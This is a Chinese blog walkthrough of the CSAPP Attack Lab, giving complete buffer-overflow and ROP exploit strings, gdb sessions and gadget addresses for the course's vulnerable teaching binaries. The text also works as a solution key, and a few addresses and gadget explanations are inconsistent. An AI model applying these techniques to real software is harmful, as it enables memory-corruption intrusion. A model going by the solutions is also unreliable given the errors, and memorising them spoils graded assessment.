CSAPP 3e Attack lab

總結一下CSAPP第三版的各個lab。
這裏介紹的是Attack lab,主要考察code-injection、return-oriented-programming攻擊的理解,和gdb,objdump的簡單使用。

首先登陸網站http://csapp.cs.cmu.edu/3e/labs.html。Windows下點擊Self-Study Handout獲取壓縮包。我的工作環境是ubuntu,64位操作系統,使用wget指令直接下載。(chrome點擊F12選取元素獲取下載地址)tar解壓。

請務必閱讀一下http://csapp.cs.cmu.edu/3e/attacklab.pdf的官方說明。

這個實驗主要是針對第三版的二三章,關於緩衝區溢出攻擊的練習。與第二版不同之處在於增加了ROP(Return-Oriented Programming)的攻擊手段。單純的緩衝區溢出攻擊容易受到堆棧隨機化,金絲雀防護的制約。而ROP攻擊利用程序中已有的彙編代碼片段組合出需要執行的指令。推薦http://drops.wooyun.org/tips/3071這篇文章,進一步講述了Blind Return Oriented Programming (BROP) Attack。看完之後如果感覺理解有困難,可以瀏覽一遍http://www.scs.stanford.edu/brop/bittau-brop-slides.pdf
這裏假定已經大致瀏覽過說明,對各個文件的內容有了解。
簡要 說明一下:

  • cookie.txt:存放你攻擊用的標識符
  • rtarget:執行return-oriented-programming攻擊的程序
  • ctarget:執行code-injection攻擊的程序
  • farm.c:“gadget farm產生代碼片段用的
  • hex2raw:生成攻擊字符串用的

實驗分爲5個部分。

Phase 1
首先反彙編可執行程序,生成彙編代碼。
objdump -d ctarget > ctarget.d
這一關的任務是從test函數跳轉到touch1,。
test如下:

void test() {
      int val;
      val = getbuf();
      printf("No exploit. Getbuf returned 0x%x\n", val);
}

彙編如下:

test:

0000000000401968 <test>:                                                                                     
  401968:   48 83 ec 08             sub    $0x8,%rsp
  40196c:   b8 00 00 00 00          mov    $0x0,%eax
  401971:   e8 32 fe ff ff          callq  4017a8 <getbuf>
  401976:   89 c2                   mov    %eax,%edx
  401978:   be 88 31 40 00          mov    $0x403188,%esi
  40197d:   bf 01 00 00 00          mov    $0x1,%edi
  401982:   b8 00 00 00 00          mov    $0x0,%eax
  401987:   e8 64 f4 ff ff          callq  400df0 <__printf_chk@plt>
  40198c:   48 83 c4 08             add    $0x8,%rsp

這裏根據提示直接溢出覆蓋getbuf的緩衝區,填寫touch1的地址空間即可。

getbuf:

00000000004017a8 <getbuf>:
  4017a8:   48 83 ec 28             sub    $0x28,%rsp
  4017ac:   48 89 e7                mov    %rsp,%rdi
  4017af:   e8 8c 02 00 00          callq  401a40 <Gets>
  4017b4:   b8 01 00 00 00          mov    $0x1,%eax
  4017b9:   48 83 c4 28             add    $0x28,%rsp
  4017bd:   c3                      retq   
  4017be:   90                      nop  
  4017bf:   90                      nop 

touch1:

00000000004017c0 <touch1>:                                                                                              
  4017c0:   48 83 ec 08             sub    $0x8,%rsp
  4017c4:   c7 05 0e 2d 20 00 01    movl   $0x1,0x202d0e(%rip)        # 6044dc <vlevel>
  4017cb:   00 00 00
  4017ce:   bf c5 30 40 00          mov    $0x4030c5,%edi
  4017d3:   e8 e8 f4 ff ff          callq  400cc0 <puts@plt>
  4017d8:   bf 01 00 00 00          mov    $0x1,%edi
  4017dd:   e8 ab 04 00 00          callq  401c8d <validate>
  4017e2:   bf 00 00 00 00          mov    $0x0,%edi
  4017e7:   e8 54 f6 ff ff          callq  400e40 <exit@plt>

buf的起始地址爲%rsp,然後大小爲0x28(40)字節,只要填充着四十個字節之後,追加touch1的地址作爲返回地址即可:0x4017c0。64位地址格式,高位補充0,完整地址爲0x00000000004017c0。注意寫彙編時的大小端問題!!!直接看代碼就可以看出是小端。

4017ce:   bf c5 30 40 00          mov    $0x4030c5,%edi

或者使用gdb調試一下:
b設置斷點,r爲運行,加參數-q是因爲實驗爲本地實驗,不提交。x輸出一下rsp寄存器內容,x/b顯示單字節,可以看到是從高位開始。

gdb ctarget 
(gdb) b test
Breakpoint 1 at 0x401968: file visible.c, line 90.
(gdb) r -q
Starting program: /home/ubuntu/workspace/target1/ctarget -q
Cookie: 0x59b997fa

Breakpoint 1, test () at visible.c:90
90      visible.c: No such file or directory.
(gdb) x/gx $rsp
0x5561dcb0:     0x0000000000401f24
(gdb) x/b
0x5561dcb8:     0x00
(gdb) 

因爲是小端模式,所以追加的地址格式爲c0 17 40 00 00 00 00 00。vim一個txt或者hex文件,內容如下(30換成CC什麼的也可以):

30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30
c0 17 40 00 00 00 00 00 

然後調用下面命令查看結果(參考說明書有其他寫法):

cat ctarget11.txt | ./hex2raw | ./ctarget -q 

Phase 2
第二關在第一關的基礎上增加了參數傳遞。
下面是touch2代碼:

 void touch2(unsigned val)
  {
     vlevel = 2; /* Part of validation protocol */
     if (val == cookie) {
         printf("Touch2!: You called touch2(0x%.8x)\n", val);
         validate(2);
     } else {
         printf("Misfire: You called touch2(0x%.8x)\n", val);
         fail(2);
     }
     exit(0);
 }

touch2彙編:

00000000004017ec <touch2>:
  4017ec:   48 83 ec 08             sub    $0x8,%rsp                                                                    
  4017f0:   89 fa                   mov    %edi,%edx
  4017f2:   c7 05 e0 2c 20 00 02    movl   $0x2,0x202ce0(%rip)        # 6044dc <vlevel>
  4017f9:   00 00 00
  4017fc:   3b 3d e2 2c 20 00       cmp    0x202ce2(%rip),%edi        # 6044e4 <cookie>
  401802:   75 20                   jne    401824 <touch2+0x38>
  401804:   be e8 30 40 00          mov    $0x4030e8,%esi
  401809:   bf 01 00 00 00          mov    $0x1,%edi
  40180e:   b8 00 00 00 00          mov    $0x0,%eax
  401813:   e8 d8 f5 ff ff          callq  400df0 <__printf_chk@plt>
  401818:   bf 02 00 00 00          mov    $0x2,%edi
  40181d:   e8 6b 04 00 00          callq  401c8d <validate>
  401822:   eb 1e                   jmp    401842 <touch2+0x56>
  401824:   be 10 31 40 00          mov    $0x403110,%esi
  401829:   bf 01 00 00 00          mov    $0x1,%edi
  40182e:   b8 00 00 00 00          mov    $0x0,%eax
  401833:   e8 b8 f5 ff ff          callq  400df0 <__printf_chk@plt>
  401838:   bf 02 00 00 00          mov    $0x2,%edi
  40183d:   e8 0d 05 00 00          callq  401d4f <fail>
  401842:   bf 00 00 00 00          mov    $0x0,%edi
  401847:   e8 f4 f5 ff ff          callq  400e40 <exit@plt>

首先彙編函數的第一個參數儲存在%edi中,所以我們的目標就是把cookie值存儲到%edi中,然後跳轉到touch2。注入代碼如下:

  movq $0x59b997fa,%rdi
  pushq $0x004017ec         
  retq  

這裏可以把用gcc和objdump把彙編代碼翻譯爲機器碼。以上代碼存儲爲insertValue.s 。

gcc -c insertValue.s
objdump -d insertValue.o  > insertValue.d 

得到如下機器碼:

insertValue.o:     file format elf64-x86-64


Disassembly of section .text:

0000000000000000 <.text>:
   0:   48 c7 c7 fa 97 b9 59    mov    $0x59b997fa,%rdi
   7:   68 ec 17 40 00          pushq  $0x4017ec
   c:   c3                      retq   

然後使用上述字節碼,填充到40字節,追加%rsp的地址作爲返回地址,來執行這些代碼。
下面使用gdb獲取%rsp地址。在getbuf中的Gets那裏打一個斷點,查看一下rsp地址。

gdb ctarget
(gdb) b *0x4017af
Breakpoint 1 at 0x4017af: file buf.c, line 14.
(gdb) r -q
Starting program: /home/ubuntu/workspace/target1/ctarget -q
Cookie: 0x59b997fa

Breakpoint 1, 0x00000000004017af in getbuf () at buf.c:14
14      buf.c: No such file or directory.
(gdb) info registers
rax            0x0      0
rbx            0x55586000       1431855104
rcx            0x3a676e6972747320       4208453775971873568
rdx            0xc      12
rsi            0x7ffff7dd59e0   140737351866848
rdi            0x5561dc78       1432476792
rbp            0x55685fe8       0x55685fe8
rsp            0x5561dc78       0x5561dc78
r8             0x0      0
r9             0x4032b4 4207284
r10            0x7ffff7fe0740   140737354008384
r11            0x7ffff7aa15c0   140737348507072
r12            0x2      2
r13            0x0      0
r14            0x0      0
r15            0x0      0
rip            0x4017af 0x4017af <getbuf+7>
eflags         0x216    [ PF AF IF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0

或者使用

(gdb) ctarget

(gdb) b *(getbuf+14)
(gdb) run -q
Starting program

(gdb) p/x $rsp

這裏可以看到地址爲0x5561dc78,所以我們得到如下文件ctarget21.txt:

48 c7 c7 fa 97 b9 59 68 ec 17
40 00 c3 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30
78 dc 61 55 00 00 00 00       

然後調用下面命令查看結果(參考說明書有其他寫法):

cat ctarget21.txt | ./hex2raw | ./ctarget -q 

Phase 3
這一關需要把cookie轉化成字符串傳遞到touch3.

 void touch3(char *sval)
 {
     if (hexmatch(cookie, sval)) {
         printf("Touch3!: You called touch3(\"%s\")\n", sval);
         validate(3);
     } else {
         printf("Misfire: You called touch3(\"%s\")\n", sval);
         fail(3);
     }
     exit(0);
 }

注意這裏的問題,首先是cookie的存放位置,如果存放到buf裏,那接下來的hexmatch可能會覆蓋它的堆棧,但是buf的父堆棧是安全的,我們把touch3的地址放到父堆棧的頂部就可以了。

我們首先構造注入代碼,touch3的地址爲0x4018fa,根據上一關我們已經得到的%rsp地址0x5561dc78,返回地址應爲%rsp+0x28(保存代碼執行地址的位置),然後字符串地址應爲%rsp+0x30(48).

movq $0x5561dc98,%rdi                                                                                                   
pushq $0x004018fa
retq
~                                        

保存爲bufInsert.s(原諒我亂起的名字,要知道,變量命名是程序員第一難題)。

gcc -c bufInsert.s
objdump -d bufInsert.o  > bufInsert.d 

得到如下代碼:

   0:   48 c7 c7 98 dc 61 55    mov    $0x5561dc98,%rdi
   7:   68 fa 18 40 00          pushq  $0x4018fa
   c:   c3                      retq   

接着構造字符串,我的cookie是0x59b997fa,這裏需要轉換成ASCII格式,使用man ascii查看即可,我的對應ascii碼爲35 39 62 39 39 37 66 61 00。

總結一下,文件應該有以下幾個部分,首先是注入的代碼以及填充字節,然後是注入代碼的地址,最後是字符串。構造ctarget31.txt如下:

48 c7 c7 a8 dc 61 55 68 fa 18                                                                                           
40 00 c3 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30
78 dc 61 55 00 00 00 00  
35 39 62 39 39 37 66 61 00

執行:

cat ctarget31.txt | ./hex2raw | ./ctarget -q

對啦!!看一下成功的樣例:

Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target ctarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:ctarget:3:48 C7 C7 A8 DC 61 55 68 FA 18 40 00 C3 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 78 DC 61 55 00 00 00 00 35 39 62 39 39 37 66 61 00 

Phase 4
下面的兩關都是使用ROP攻擊的例子了,因爲棧隨機化,所以不能使用固定的%rsp地址跳轉,有些區域還會禁止代碼可執行,這裏使用ROP,用程序自身的代碼片段來構造攻擊。

這裏的目標和Phase2一樣,傳遞cookie(0x59b997fa)到touch2(0x4017ec)。
就是如何把cookie傳遞到%edi裏面的問題,最簡單的想法是把cookie存到%rsp裏面,然後彈出,但是沒有找到 popq %$rdi(字節碼5f,查詢開始的pdf手冊可得)。但是找到了代表popq %rax的字節碼58。代碼地址如下(objdump rtarget可得):

00000000004019a7 <addval_219>:
  4019a7:   8d 87 51 73 58 90       lea    -0x6fa78caf(%rdi),%eax
  4019ad:   c3                      retq  

地址爲0x4019ab,gadget1!!!!

後續動作可以利用下面代碼完成:

    popq %rax
    movq %rax %edi
    ret 

movq %rax %edi字節碼爲48 89 c7 c3
在下面這段代碼找到:

00000000004019c3 <setval_426>:
  4019c3:   c7 07 48 89 c7 90       movl   $0x90c78948,(%rdi)
  4019c9:   c3                      retq

起始地址爲0x4019c5,gadget2

總結一下,文件應該包含以下幾部分,首先是填充區,然後是gadget的返回地址,cookie,gadget2的返回地址,touch2的地址。構造ctarget4.txt文件如下:

cc cc cc cc cc cc cc cc cc cc                                                                                           
cc cc cc cc cc cc cc cc cc cc
cc cc cc cc cc cc cc cc cc cc
cc cc cc cc cc cc cc cc cc cc
ab 19 40 00 00 00 00 00
fa 97 b9 59 00 00 00 00  
c5 19 40 00 00 00 00 00  
ec 17 40 00 00 00 00 00  

執行:

cat ctarget4.txt | ./hex2raw | ./rtarget -q

Phase 5
這一關目標和Phase3一樣,使用cookie構造字符串傳遞到touch3,使用rop的攻擊手段。
首先尋找和%rsp相關的代碼。
4889e0 movq %rsp, %rax
找到如下片段:

0000000000401aab <setval_350>:
  401aab:   c7 07 48 89 e0 90       movl   $0x90e08948,(%rdi)
  401ab1:   c3                      retq

第一個gadget1地址爲0x401aad

接下來我們需要一個可以遞增%rax的代碼片段來指向我們的cookie地址。
找到代表add $0x37, %al04 37

00000000004019d6 <add_xy>:
  4019d6:   48 8d 04 37             lea    (%rdi,%rsi,1),%rax
  4019da:   c3                      retq

第二個gadget2地址爲0x4019d8
接下來需要%rax內容移動到%rdi中,找到代表mov %rax, %rdi48 89 c7
片段如下:

00000000004019a0 <addval_273>:
  4019a0:   8d 87 48 89 c7 c3       lea    -0x3c3876b8(%rdi),%eax
  4019a6:   c3                      retq

第三個gadget3地址爲0x4019a2

現在總結一下,攻擊的文件應該有如下部分,填充區1,gadget1,gadget2,gadget3,touch3的地址,填充區2,cookie。第二個填充區的大小爲55(0x37)-3*8=31字節。最後構造文件ctarget5.txt如下:

cc cc cc cc cc cc cc cc cc cc                                                                                           
cc cc cc cc cc cc cc cc cc cc
cc cc cc cc cc cc cc cc cc cc
cc cc cc cc cc cc cc cc cc cc
ad 1a 40 00 00 00 00 00
d8 19 40 00 00 00 00 00  
a2 19 40 00 00 00 00 00
fa 18 40 00 00 00 00 00
dd dd dd dd dd dd dd dd dd dd
dd dd dd dd dd dd dd dd dd dd
dd dd dd dd dd dd dd dd dd dd
dd
35 39 62 39 39 37 66 61 00

執行:

cat ctarget5.txt | ./hex2raw | ./rtarget -q    
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章